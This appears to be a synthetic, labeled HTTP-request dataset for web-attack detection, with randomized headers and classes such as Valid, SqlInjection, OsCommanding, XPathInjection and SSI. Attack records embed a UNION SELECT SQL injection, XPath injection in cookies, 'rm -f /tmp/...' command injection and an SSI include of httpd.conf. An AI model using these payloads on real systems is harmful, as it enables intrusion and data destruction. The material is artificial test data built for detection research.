Transfer-Encoding: compress
Upgrade: yeec2/5.6, ruid/6.9, hk5h/6.6, gr6/5.3, hwts3p/7.9
Warning: 429 www.qeaekar.css "znitcTi8Srsbaoas" "Mon, 02 Aug 04 21:38:04 CET"
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 8869070380
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 3362
Start - Id: 50116
class: XPathInjection
POST /luQG2A/rnrt0ptAhwmZec/Bnetcatn4JeYvcXVSw4/crnctsb3adta4writ.shtml? HTTP/1.0
Content-Length: 71
Content-Language: rxirho,udat6I
Content-Encoding: compress
Content-Location: http://www.8zitcpt6.st/eefaxts/oa8lsild/TaYpzenr/NeLseetp/y55yrccy.tar
Content-MD5: QWVDZXRydHJlc3RUbm9jaQ==
Content-Type: application/x-www-form-urlencoded
Host: www.oteeb.cz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: euc-jp, utf-7, x-mac-arabic
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 6.230.241.102
Cookie: dode6uqH=7r'     or    count(   path/child::node()[position(  )=((    i   + j+  k   +  l    +  1)]  | path/child::*()[position()=(k+1)])=1  or  'ee5icdhe'    = '    dm'  or;FCpOI=77401726;Z9Yt=iFLoVHsF;enqm=TSo0cO9oc6
ETag: W/"AW4m3HM.UY@1uRWaJ@"
If-Unmodified-Since: Sun, 03 Jul 05 15:19:33 CET
If-Match: *
Max-Forwards: 6
MIME-Version: 8.6
Pragma: no-cache
Referer: http://www.ezrgdEr.com/pctr/x3eeh/nlkCR.pl
TE: trailers,trailers,trailers
User-Agent: Mozilla/1.8 (Windows; U; Win 9x 3.4; 42-ot; rv:5.0.8) Gecko/24574997
Via: HTTP/8.8 www.cpJep.js, plsHd/3.8 202.25.177.124:154
Transfer-Encoding: compress
Warning: 021 15.34.115.139 "tOiad" "Sun, 11 Nov 07 04:42:33 CET"

g9PEXY3=66425&NdNgiTnvssr=tDH1F-&eewt84eIey=R juu~CcdqstdincH&tb=eMji

End - Id: 50116
Start - Id: 13563
class: Valid
GET /brntk4vnnha/2O/dVNThIVO/rEMnnas07uvtDBeaewt/n50z7/2temtzXrqett/aenwh62ranc/geOu2wapbncq6uleem/oTlaegib/6KaNaz/5ntiewahstgti/YechoAyOF.asmx?eoutGslvtaar=%5Bi%3Crcp6 HTTP/1.0
Host: 173.27.172.103
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4, compress;q=0.9, deflate;q=0.9, identity;q=0.3, identity
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 186.108.47.189
Cookie: 7irne=70;Igozaiht=62984259;qsdwotyeoavsmm=2939;3u8p=St2onsuayvl;ouhstap=06;aitni0chtMep=jhcopy)y
Cookie2: $Version="99"
Date: Thu, 16 Nov 06 01:00:27 UTC
ETag: W/"3-8ueFgn@WAbCGu@cRQ"
Expect: 100-continue
From: rctr@uneqdrer.ch
If-Modified-Since: Thu, 04 May 06 11:10:06 GMT
If-Unmodified-Since: Wed, 30 Jun 04 13:02:01 GMT
If-Match: "Balx760HBi7ov5Fc"
If-None-Match: *
If-Range: Mon, 08 Aug 05 24:15:41 CET
Max-Forwards: 15
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: noxn uaenegsM=zmtlt
Authorization: Basic Tm9zdHM6aG5pNA==
Range: -808,133-44
Referer: http://www.heOd.biz/mfrt9/n62a0.exe
TE: gzip,trailers,gzip;q=0.7
Trailer: TE
User-Agent: Mozilla/6.8 (Windows; U; Win 9x 0.6; ht-ex; rv:8.1.8) Gecko/30604132
UA-CPU: Sparc
UA-Disp: 8631,7824,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1988x830
Via: keamy/6.0 www.qseid.tiff
Transfer-Encoding: hlzt; qar7ma=3e4ehas
Upgrade: nsn/1.6, ehws/2.2
Warning: 043 146.69.29.103 "pLtaauntea6teETrue" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 70032554284651
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13563
Start - Id: 34645
class: Valid
POST /erlt/Er3e78tsaAoan/yfR.mdb? HTTP/1.0
Content-Length: 95
Content-Language: sns,5rokt
Content-Encoding: identity
Content-Location: http://www.haiyn5Nh.fr/rtdMiQ/tItose2/ladaTleI/hirt/tfgEee.jpg
Content-MD5: YWlkaUloaDhjbHV0QXJtYg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Sep 05 03:12:35 GMT
Last-Modified: Tue, 14 Sep 04 03:36:45 CET
Host: 232.40.16.252:80
Connection: fpnudlst
Accept: */*
Accept-Charset: cp-936;q=0.3, iso-8859-7
Accept-Encoding: 
Accept-Language: nOesf4wc-sw;q=0.3, st8oAeeo-r8;q=0.5, amuLrQt-io2nix, tAet9c-uo;q=0.0, udxCer-t
Cache-Control: max-stale=66539
Client-ip: 67.93.72.22
Cookie: tIemppcdhs4=systemk;nyasooE2rp=trWe.bkL;6f_2.JNGg=aVs@UA;7fJmP0=aceoB;6s=::oKt
Cookie2: $Version="9"
Date: Mon, 16 Jan 06 01:21:57 UTC
ETag: "qe_7hAVu7Wn2tFiI"
Expect: 100-continue
From: 58h33lcc@coecl5g.org
If-Modified-Since: Wed, 21 Jul 04 02:41:06 GMT
If-Unmodified-Since: Tue, 19 Sep 06 01:44:47 GMT
If-Match: *
If-None-Match: *
If-Range: "1NNvjpxSHlqz6V0gVE@P"
Max-Forwards: 513
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZWFicElhTDo3aW9ubQ==
Authorization: Basic RXRzczpiZXRsb2U=
Range: -92449,63-97080,49-2
Referer: /ytca9/hlKe/tgnnfn/Sicnenu/jtd1a.pdf
TE: deflate,chunked,trailers
Trailer: Accept-Encoding
User-Agent: fwoaLVb http://www.tbeoraH.be
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3397x406
Via: 9.6 www.htr2nnrp.css
Transfer-Encoding: gzip
Upgrade: 0lmc/3.2
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 09613
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aoIi8zaeiZs=qmeet&dedsttgttahhbk2=w-gDiXNq2k6M&cfond4u=leerztdh2boavi&rehll=38106&pramio0kbr=te

End - Id: 34645
Start - Id: 43405
class: OsCommanding
GET /nBSu9hYxq/5drnr5ralgnsvU7m/e6usUsR4I.js?edOevtte=36629017&oooyliondadnoni=nCmfi&mmt6mhwtt7uaic=2.CVT&nezmrlsw5vft=8ye12d6&-YY12_9Spassthrusock_stream@=8090843&hW2apeaeamXoele=rRiNo&src=eXm4LkT5x&ea05sSuiireenrY=ttihsteonurn&aihGahsgeeahse=tllbody%3Bq+tobjecthDjallmuv&iiharl=rm+-f++++%2Ftmp%2Faes+++%7C&cIVU@passthrut_b8=iyqoi&hiwnmen1dn1tko=dnoehsnm3ePs&Wrm3=2743&rhmutiop=t5lhjuilarmn%3FMno&edLeTctO8=ei3dms%7Ccrpisi HTTP/1.0
Host: www.He2at.com:20
Connection: close
Accept: application/x-tar
Accept-Charset: iso-8859-4, x-mac-turkish, cp-936
Accept-Encoding: 
Accept-Language: iltt-oaje, infRzhw-hmooltvH;q=0.2, aoMoheg-aedetrP, siI22e-xoiies;q=0.3, EeaA-gder
Cache-Control: only-if-cached
Client-ip: 232.231.66.96
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Thu, 10 Jul 08 14:08:37 UTC
ETag: W/"FBRRehdBHitCX2E"
Expect: hWd4dMn
From: 3vrss@buns5n.org
If-Modified-Since: Mon, 06 Dec 04 17:27:52 CET
If-Unmodified-Since: Sun, 16 Apr 06 09:21:15 UTC
If-Match: *
If-None-Match: "Zx4BT_YUvjsydfT"
If-Range: *
Max-Forwards: 229
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic ZWF6dDU6ZXVucA==
Range: 6-,47-768842,6146-09
Referer: /rt9Ryufs/a68oL/leVfdsIa/lehfe7e/raky.exe
TE: chunked;q=0.3
Trailer: If-Range
User-Agent: Mozilla/3.3 (X11; U; SunOS sun4u 7.6; tn-de; rv:5.8.3) Gecko/95631882
UA-CPU: 68000
UA-Disp: 3207,5717,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9788x122
Via: t8h/0.5 180.32.184.80:2246, 4.3 250.251.227.123, xedy/3.9 www.5axidlj.css
Transfer-Encoding: deflate
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43405
Start - Id: 42618
class: SqlInjection
GET /lDLlLjP9Di.GGfCGGeE/tBUx.mxqe0D0FVdsR36-/mmds/6XLir/mmX@Tij2T/eN2miL1cx@m3NA0e/daaG5emgnciiRbnz3e/eoe/In-ffcopenS6samTkfaP/miur/rgi5NRu2NK0PH4mTb/60QJgK35Z3hOtqLI-PX.php4?RyymnnF4griuaet=%27++++%29+++UNION+++++ALL++++SELECT+++da1b1aih++%2C+84Oowao++++%2C+++++an++FROM+++++3au++WHERE++6r+++++NOT++IN+++%28++%27ernh1%27++++%29++AND++6l++++NOT+IN++%28++++%27j1y1hiumm%27++%29+AND++%27%27+%3D++++%27 HTTP/1.0
Host: 39.77.176.148:704
Connection: patdta
Accept: */*
Accept-Charset: x-mac-cyrillic, iso-8859-9, shift_jis;q=0.7, utf-7;q=0.5, windows-1255;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 51.55.210.40
Cookie: 7ivlei=49;hctNtm=lFFgwh@;phpxdhD8=N0v3ao1cAldi5i0oe;vuARo2= ;nxolItq=530;iRp=Li\oh
Cookie2: $Version="942"
Date: Sat, 10 Jan 09 05:41:12 CET
ETag: W/"FXXTyG49LAn3eWm@Zb"
Expect: 100-continue
From: auoiBfre@itih.st
If-Modified-Since: Sun, 11 Mar 07 20:47:01 GMT
If-Unmodified-Since: Wed, 19 Apr 06 09:24:33 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 06 Dec 06 14:06:12 CET
Max-Forwards: 45
MIME-Version: 0.0
Pragma: Utne='qoowHten'
Proxy-Authorization: Basic ZTZhMjpyOGRzeQ==
Authorization: Basic c3Nlc29mOm1ob3R5dGJw
Referer: /3stpd/osirnt.asp
TE: trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/2.6 (Machintosh; U; PPC Mac OS X 4.6; me-tn; rv:3.3.4) Gecko/52369818
UA-CPU: x86
UA-Disp: 4133,8176,16
UA-OS: Mac OS X
UA-Pixels: 4720x346
Via: HTTP/7.5 www.i4tgin.shtml:59, 5.8 230.89.99.224:8341, HTTP/3.1 222.23.88.52
Transfer-Encoding: oethN; Sk2exwoe=n1um
Upgrade: tTeemn/3.0, mb5/6.3, ezf/4.1
Warning: 746 125.14.120.8 "Ooss" 
X-Forwarded-For: 32.163.55.249
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42618
Start - Id: 43389
class: OsCommanding
GET /fxemtirntedtitoxre/lnedHdfatZhrt4eTwP1n/tet/Wkei5nephsHltofa/KPfOcG.css?TBxaqe920iG3=olshi&oixdo=oen0execEhslstdvarE&eAhareagrt=0c7o&qn6t2jceDnu=rm++++-f++++%2Ftmp%2Fn++%7C&aog=wnhfHEo&hF01nSURps0OC=978620&atcsce=emdc&nyzonnsttL=htpassis&aanr1rHh=mtfbgsound%5Ci4ri%7Eo%7Em%5Ce HTTP/1.1
Host: 237.224.66.120:485
Connection: Rastfyr
Accept: image/*, video/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: 3-ft;q=0.4, iodOsg-ta8ti;q=0.4, aeduo9ze-Q;q=0.6, pt6Lbm-tse3;q=0.4, tzti-a;q=0.8
Cache-Control: tCate='hiy'
Client-ip: 197.198.23.122
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="6"
Date: Wed, 28 Apr 10 20:54:11 UTC
ETag: W/"AMQ50BgW5OZswZc"
Expect: 100-continue
From: no4b@rasantepan.ch
If-Modified-Since: Thu, 18 Dec 08 11:50:24 UTC
If-Unmodified-Since: Tue, 02 Jun 09 24:55:58 GMT
If-Match: "v8gUMR38inclouEVOl"
If-None-Match: *
If-Range: *
Max-Forwards: 80
MIME-Version: 1.8
Pragma: lv0e='6dil'
Proxy-Authorization: Digest realm
Authorization: Basic dGJ2ZXJuajp0c3RvbTVj
Range: 6605-,-56,5118-
Referer: http://www.ls1h.it/htrr/d0hier/nseEstSi.sh
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/3.4 (X11; U; Open BSD i386 9.7; 5g-to; rv:2.7.3) Gecko/22408769
UA-CPU: StrongARM
UA-Disp: 400,542,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 5.9 161.28.182.43
Transfer-Encoding: identity
Upgrade: 37mj/0.5, lgeOa/4.4, ot2tcN/1.9, rat/6.0, EpB/9.2
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43389
Start - Id: 39808
class: SSI
GET /o33xhiosmaEi/lhC5_H67JyZlepD0/in0oy4/goooO1t8._UVJlc4uK2.nsf?tacic=6Knvyc%25tiOscriptrm&oeChddt=25&eivglyeAefad=1809&ftnob=Mkhg&ep8baere=o&cE=%3C%21--++++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&VgQeEbMSE1C=ea&vimgpQaFFHRsNZ=al7iez+niaoh&ces=eseleeliutincd&rtfhwg1es0eCyye=ese&stdci7oI=116589 HTTP/1.0
Host: www.ieio.de:6858
Connection: keep-alive
Accept: application/zip;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, gzip, compress;q=0.3
Accept-Language: *
Cache-Control: min-fresh=73
Client-ip: 43.200.222.134
Cookie: sgde=d2Lnas
Cookie2: $Version="9"
Date: Fri, 21 Dec 07 02:21:22 GMT
ETag: W/"HB4MgAj2e0M.0QXb"
Expect: 100-continue
From: cbnnjsi@dofak2rw.org
If-Modified-Since: Sun, 19 Apr 09 11:59:37 GMT
If-Unmodified-Since: Thu, 05 Jan 06 10:41:42 UTC
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: "UcwULRMLtApxhRL-PO-"
If-Range: Sun, 15 Jun 08 07:53:42 CET
Max-Forwards: 0745
MIME-Version: 1.9
Pragma: f5r=8li
Proxy-Authorization: Digest username="eege"
Authorization: Basic bzRhZzpIazdSdGFpaA==
Range: 9717-347450,4-
Referer: /ldribast/etnn/ueEf/00ze.wmn
TE: deflate;q=0.4,gzip;q=0.6,trailers
Trailer: Connection
User-Agent: Fogohco
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: 3.0 223.213.41.58:544, HTTP/1.3 144.44.248.41, FTP/6.0 250.151.244.186
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 410 230.107.4.184 "ldn6oohitmEt6c" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39808
Start - Id: 3607
class: Valid
GET /iIz35WbzFL@c3-/cctCrovjiauReqse8ef/esatdlanlcann/eepqtotesceanttlhlva/opets/em/rlageIo2i5esea0/eCSg4rV2@H@DZJkjl9k0/El1Y7Owp-Mw..tiff? HTTP/1.1
Host: www.eihsnyussn.fr
Connection: keep-alive
Accept: image/*;q=0.5, image/png;q=0.1, audio/x-wav
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7842
Client-ip: 128.157.32.52
Cookie: ra=0039;2n=0449;hrteAeaeaa0acta=45;HewaebEEehgranT=oniA;oEqUiVJ=75
Cookie2: $Version="746"
Date: Thu, 30 Jun 05 22:33:25 CET
ETag: W/"-nf2lvC2chfFdKVoeX"
Expect: 100-continue
From: hdnKu@e5ctnmptt8.cz
If-Modified-Since: Sat, 22 Mar 08 16:12:17 GMT
If-Unmodified-Since: Fri, 23 Feb 07 05:30:43 UTC
If-Match: *
If-None-Match: "Vw@yoGNVAOzeEe2NMqjV"
If-Range: Sat, 02 Feb 08 11:57:17 CET
Max-Forwards: 62
MIME-Version: 6.3
Pragma: r4sqdo2='ieR'
Proxy-Authorization: Digest qop=auth-int
Authorization: afuq ofeeD5=sgin
Range: -276748,6-3375
Referer: /toEpt.php4
TE: trailers,chunked;q=0.9,gzip
Trailer: Proxy-Authorization
User-Agent: ehsi3/1.1.9.2
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9083x610
Via: FTP/2.7 www.t3ho3f.html, 7.8 www.jnkhsto.shtml:4066, HTTP/8.9 www.ghok.js:9
Transfer-Encoding: deflate
Upgrade: aHnnn/4.7, e0Tge/7.4
Warning: 794 www.dlUteCja.htm "intmTihasyncs7wBlnT" "Sun, 26 Feb 06 19:18:11 UTC"
X-Forwarded-For: 35.71.57.22
X-Serial-Number: 41732
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3607
Start - Id: 109
class: Valid
GET /rtisdcreu9e/osXwtbD.php3?eie=e4ee%7C9rdt%3Eewexectelnetlio&qDteaqhshoxdpbe=74822935&ilyro=c+Nae9o&4wzhgrtStmo=ddrop3&szfio=8&USjcg.n=ebtInnsi&sRcotyoeoq1or=r6-UoSmC1z&ishplS=nApiuPFfpv HTTP/1.1
Host: www.iurwn.be:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-tw
Accept-Encoding: 
Accept-Language: 4eaoeAa-n;q=0.3, 1t-8eer;q=0.1, a9ns9ri-ei
Cache-Control: only-if-cached
Client-ip: 246.234.247.119
Cookie: gFfhsOyddzT=4otn;jdntAaldeesalnn=tupdatea;t7ahrFbPar=l70mVuxp
Cookie2: $Version="879"
Date: Sat, 19 Sep 09 04:36:39 CET
ETag: W/"UpN3.db1eMkvPra"
Expect: 100-continue
From: rnno@ee6menBpiS.be
If-Modified-Since: Sat, 23 Oct 04 13:49:56 CET
If-Unmodified-Since: Sun, 09 May 04 11:44:25 UTC
If-Match: "MOuyG7xzR4Tzp1QeKfWc"
If-None-Match: *
If-Range: Mon, 13 Feb 06 09:50:46 GMT
Max-Forwards: 2
MIME-Version: 0.8
Pragma: r='ycacd'
Proxy-Authorization: mEaE 9tettee=whEste0t
Authorization: Basic U253RWFhYzpleGFm
Range: -84012,-01335,-234
Referer: http://sicykgnc.fr/c4rabtno/eLud/vnoacln.gif
TE: gzip,trailers
Trailer: Pragma
User-Agent: t.Slx.6c http://www.1nya.com
UA-CPU: MIPS
UA-Disp: 156,678,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5749x1102
Via: 1.8 110.90.146.50, 5.9 www.arieeaa.html, 1.3 190.166.20.42:93
Transfer-Encoding: nger3
Upgrade: gboEt/1.0, yTh/2.4, i8pth/2.0, grs/4.8, Gwwso/1.0
Warning: 072 208.33.148.233:391 "ceisHREdehQstgAa" "Wed, 04 Jul 07 07:49:02 GMT"
X-Forwarded-For: 175.234.36.217
X-Serial-Number: 9265848475
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 109
Start - Id: 2152
class: Valid
GET /sb/tasthedietOsrwasja1/rS.iPrgJASzMgpiD7fK/yyr.css?uef=o5rxsystemdd6ob&tmtmuttca=%2Bo HTTP/1.1
Host: www.txowe.st
Connection: iutpwt
Accept: text/*;q=0.1, audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.2
Accept-Language: qf-sw0se, nahgsjt-ognEed, BS-i3sn
Cache-Control: no-transform
Client-ip: 94.217.190.139
Cookie: o0Eecroe1mhhltl=26640;nFyweDyAWQ8G=22;R2NWrI=7;fUFBVD5Ppc=6712;eaeqde=ea-W
Cookie2: $Version="400"
Date: Thu, 03 Jul 08 11:58:06 GMT
ETag: W/"zZtg8HfBn-ADvsOA"
Expect: rcrct25y
From: cwaupt@0tmyctatse.net
If-Modified-Since: Fri, 13 Oct 06 06:31:59 UTC
If-Unmodified-Since: Wed, 08 Nov 06 04:20:10 CET
If-Match: "1c9ptX2A0MCbnFj"
If-None-Match: "Ma_J4I2u0pl1@p9ogP55"
If-Range: "@QWvswOR2h5r5kg"
Max-Forwards: 7
MIME-Version: 3.0
Pragma: heh=guL
Proxy-Authorization: Digest nonce
Authorization: Basic MXNuN3JyaU86dGdkSHpzZA==
Range: -355382,8-,197-881019
Referer: http://www.rHcca9hO.net/houms0F8/onre5it/tciee/nbrbseFe.jpeg
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/0.6 (Machintosh; U; PPC Mac OS X 6.7; ik-89; rv:9.2.7) Gecko/50809168
UA-CPU: MIPS
UA-Disp: 926,2372,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 114x854
Via: 1.0 www.te8vd.html, 3.5 26.68.128.116
Transfer-Encoding: deflate
Upgrade: lsrylr/1.6, 3iueu/0.5, omee/0.5
Warning: 918 www.el1rbcw.jpg "atie2" "Thu, 08 Mar 07 15:19:23 UTC"
X-Forwarded-For: 186.3.114.97
X-Serial-Number: 9895241717803854226
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2152
Start - Id: 18900
class: Valid
GET /eyewrteTgtkUgv3l7M7l/o5ilB.4e/gbO.0lMsOtywVGgvYiDe/wBClBd/lqnqbeortsn0Rcnc6oA/lLCmTO/fzCu1Tz/istfazNhjQxyFvBJ/rO97Zz8-/iEfWtJ95szc_r_R3/nYduYuetySALC_lP/c.ib.php4?oto0hi2nce=tTZZ.9T_t%40D&0ru0oaetrs=ewskeo9enjustHxr&eore=955520&nanee8ltcoooae=eBN&uesltl=2&vymmjeaqhp4loe=lRouwti&7eejsc2=oTvurmpwF HTTP/1.0
Host: 71.226.196.210
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: gzip
Accept-Language: uirqrtuo-T;q=0.4, rrd8msri-hiiro
Cache-Control: min-fresh=42801
Client-ip: 224.237.10.98
Cookie: _kxterm1=e97MerAY;axhm9Za9sts3lmo=ftlo
Cookie2: $Version="4"
Date: Sun, 07 Nov 04 13:30:54 GMT
ETag: W/"pEiNrIvrjLW2dxiDzI"
Expect: 100-continue
From: HiPzZ@7ede4.st
If-Modified-Since: Mon, 07 Dec 09 10:14:21 CET
If-Unmodified-Since: Sun, 22 Aug 04 12:18:09 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Y3JpdGhyY282b0V3aXZyZW5neXh0ZDhlaWVubnRBd24xcmE=
Range: 14-63534,8995-18,3-83
Referer: /9nHue1s/tlpkrh/oroedjd/j5rbt3.php4
TE: deflate;q=0.6,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/9.7 (compatible; MSIE 7.7; Windows NT; h5Hnl; ydneod)
UA-CPU: MIPS
UA-Disp: 708,1125,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 905x897
Via: 3.0 38.199.126.94, FTP/8.7 199.64.251.40, 3.1 www.twt7l.jpeg
Transfer-Encoding: compress
Upgrade: nash0s/1.5, Xiiie/7.6
Warning: 226 www.njsira.shtml "3eahntvtanuw" 
X-Forwarded-For: 180.173.9.202
X-Serial-Number: 463833630
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18900
Start - Id: 45170
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: 82.42.62.118
Connection: 1m9dte
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 49.63.221.221
Cookie: bsmSo=oansait;V5CTXjwmKNR=wLYfE_d
Cookie2: $Version="70"
Date: Thu, 15 Jul 04 01:36:43 GMT
ETag: W/"nusweEuleB7R8Ih"
Expect: hness
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Tue, 02 Oct 07 19:20:38 CET
If-Match: "Z8k_-yLEt65R8Iq"
If-None-Match: "8sRO4g7qg3tp2K28C"
If-Range: "axLjniKNo@mfU5U"
Max-Forwards: 9
MIME-Version: 7.3
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: ttiwh soogktu=nltw
Range: 551-3881,-846
Referer: http://sndss.uk/oOtAiaRe.mpg
TE: trailers,trailers
Trailer: Date
User-Agent: qetifecMi/4.1.9.7.3
UA-CPU: StrongARM
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1177x8327
Via: HTTP/7.7 www.Tcns.png
Transfer-Encoding: tlEn5; ceeeeer=geezwhe
Upgrade: iis5w/2.9, 8fLc/3.7, wahe/2.1, ossrxy/5.0
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45170
Start - Id: 16266
class: Valid
GET /vdwh28fbni/aBwuKLbf2xA-ol5rCee/Vlosuay47iHoswr7eew/oe6rqeieIiewSola/c6uioMmuSVl1ypJJhJ.cgi? HTTP/1.0
Host: 90.212.109.28
Connection: ehiBrat
Accept: video/quicktime;q=0.7, video/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, identity;q=0.7
Accept-Language: k-3, aehn-mh
Cache-Control: no-store
Client-ip: 226.116.113.191
Cookie: 6IOOqgroup byQ=47413604;sepeis5hcensne=210509790;niewncsehcnp=eeIj;Ee9bwinntWV=025808
Cookie2: $Version="95"
Date: Fri, 25 Nov 05 21:33:37 CET
ETag: "CXANZw0Rk-KOgM1Jc6X."
Expect: 100-continue
From: 5oSecmlh@N6omaecn.biz
If-Modified-Since: Wed, 13 Feb 08 10:15:12 CET
If-Unmodified-Since: Wed, 28 Jun 06 21:23:40 GMT
If-Match: "6ywM@.IODDCaflNmM"
If-None-Match: *
If-Range: "FhrIhpUUEvBrUAmQ"
Max-Forwards: 223
MIME-Version: 2.6
Pragma: hrsaha='rL'
Proxy-Authorization: nres IismJ=7etN
Authorization: NTLM Y2lhTG53Ym8yNGlucnByOWVtb2V2dkVvdnNuYXdpaDJpdG9lN2V2bHBzcm5y
Range: 767-,-23616
Referer: /iuoah/Xdtmthan/mdot5yr/aaajafb/elybTO.gif
TE: deflate,trailers,trailers
Trailer: Max-Forwards
User-Agent: tTshoSB http://www.46o3u.org
UA-CPU: 68000
UA-Disp: 7368,0111,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2602x876
Via: 0.3 171.234.63.178, 5.9 105.154.192.180, 3.4 www.eSobeor.tiff:9320
Transfer-Encoding: compress
Upgrade: pno/2.0, 92s3t/7.4, hio/3.0
Warning: 593 www.czyane.jpg "hnn6i2Nors" "Sun, 24 Jun 07 01:56:04 GMT"
X-Forwarded-For: 182.148.242.42
X-Serial-Number: 1613720445559
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16266
Start - Id: 35497
class: XPathInjection
GET /eVWRY3t@4cQgxb/H@Fu6A@WHscriptKT/0-b.dll?saRde0ihn=36+Mw+uf8u00ahkam%25esE&76eOsocEonhte=drn%25tehfb&sGiuaae=564764&oseit7Atoo2ne=297206385&adnullLKXrmA=snssinputsi6&7vooNgroesgo4i=8845&aMht9rtcias=6284&rih2uFowx6plidv=+aaftne9divahbNcrme%2B&pJlibDxoFJ@VkX=pte7 HTTP/1.0
Host: 15.29.199.60
Connection: 4nhrtT
Accept: audio/*, video/quicktime;q=0.9, audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: o-deegi;q=0.3, g-lb;q=0.2, 7io-tdndh, k-iaim0;q=0.4, 0caiotT-EdtCbs;q=0.1
Cache-Control: no-cache
Client-ip: 209.250.192.160
Cookie: hfhRf=t/kiyo/I/child::node()[position()=4]  or   'kErsv'=    ';oheanfam=715672;eacthHvn=\e2lh6Gf;gAjnhTtrtpdefhw=varaccess_loghriPtIp5a6a;iololNmerrkrt=o0S
Cookie2: $Version="53"
Date: Tue, 31 May 05 12:26:23 GMT
ETag: W/"g-dkCFxHf5ZOsKZBpGD"
Expect: n3serr=yceoeeS;qmTsss=deunoaTt
From: a8rg@iaaSadh.uk
If-Modified-Since: Tue, 03 Apr 07 11:40:06 UTC
If-Unmodified-Since: Fri, 06 Aug 04 01:38:21 CET
If-Match: "rQad.Gq7ugRmTibkt"
If-None-Match: *
